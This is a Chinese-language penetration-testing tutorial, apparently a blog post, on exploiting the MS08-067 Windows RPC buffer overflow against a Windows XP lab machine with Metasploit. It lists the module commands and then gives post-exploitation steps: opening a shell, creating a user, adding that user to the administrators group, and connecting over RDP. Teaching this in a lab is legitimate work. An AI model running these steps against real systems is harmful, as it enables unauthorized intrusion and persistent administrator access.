渗透测试基础(四) MS08-067 漏洞攻击

1. 漏洞介绍

  • 漏洞描述
    • Microsoft Windows Server服务RPC请求缓冲区溢出漏洞Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。 对于Windows 2000、XP和Server 2003,无需认证便可以利用该漏洞;对于Windows Vista和Server 2008,可能需要认证。


      补充:RPC请求:Windows RPC(Remote Procedure Call,远程过程调用)是一种用于网络中进程间通信的技术,它允许一个进程调用另一个进程中的方法,就像调用本地函数一样。RPC在Windows平台上被广泛使用,用于分布式系统和网络服务之间高效的数据交换和服务调用。在RPC中,客户端发送一个包含参数的请求消息到服务器,这个消息封装了调用的方法、参数以及结果的预期类型。服务器接收到请求后,执行相应的函数并返回结果给客户端。整个过程通常是透明的,因为RPC提供了底层的协议和数据序列化,使得开发者可以专注于业务逻辑,而不必关心网络通信的细节。

  • 官方描述

2. 环境说明

  • 攻击机:kali
    • IP:192.168.102.131
  • 靶机:win XP
    • IP:192.168.102.135

3. 信息收集

  • ping 查看靶机是否存活
  • nmap 查看靶机信息

4. 渗透攻击

4.1. 启动msf

  • 命令:msfconsole

4.2. 查找漏洞

  • 命令:search ms08-067

4.3. 使用攻击模块,设置攻击载荷,设置测试机IP,设置靶机IP

  • 使用攻击模块,命令:use +攻击模块
  • 设置测试机IP,命令如下:
    • set rhost 靶机IP
    • set lhost 测试机IP

4.4. 开始攻击

  • 命令:run

    可以发现成功建立

5. 顺利进入主机

5.1 查看权限

  • Win命令:getuid
  • Linux命令:whoami

5.2 进入shell

  • 命令:shell
    • 此时就进入当前权限下的shell

5.3 添加用户帐号

  • 命令:net user 用户 密码 /add

5.4 把刚刚创建好的用户添加到管理员组

  • 命令:net localgroup administrators 用户 /add

5.5 远程登录到XP系统

  • 命令为:rdesktop 192.168.102.135
    • 前提需要让靶机支持被远程连接,做如下配置
  • rdesktop 192.168.102.135 远程连接

5.6 登录到XP系统,查看攻击是否生效

  • 打开CMD查看刚刚创建的用户是否添加到管理员组
相关推荐
AORO20252 小时前
国内好用的智能三防手机,适合户外、工业、公共安全等场景
网络·5g·智能手机·制造·信息与通信
CP-DD2 小时前
OpenWrt Network configuration
服务器·网络·windows
changhao_883 小时前
解析非法获取计算机信息系统数据罪中的其他技术手段
网络·商业秘密·非法获取计算机信息
qing222222223 小时前
记录Linux下ping外网失败的问题
linux·服务器·网络
CP-DD3 小时前
openwrt中br-lan,eth0,eth0.1,eth0.2
网络
Neolock3 小时前
从一开始的网络攻防(十四):WAF绕过
网络·安全·web安全·waf
网安INF4 小时前
【论文阅读】-《RayS: A Ray Searching Method for Hard-label Adversarial Attack》
论文阅读·人工智能·深度学习·计算机视觉·网络安全·对抗攻击
火车叨位去19495 小时前
鱼皮项目简易版 RPC 框架开发(一)
网络·网络协议·rpc
火车叨位去19495 小时前
鱼皮项目简易版 RPC 框架开发(四)
网络·网络协议·rpc
IpdataCloud6 小时前
【ip】IP地址能否直接填写255?
网络·tcp/ip·智能路由器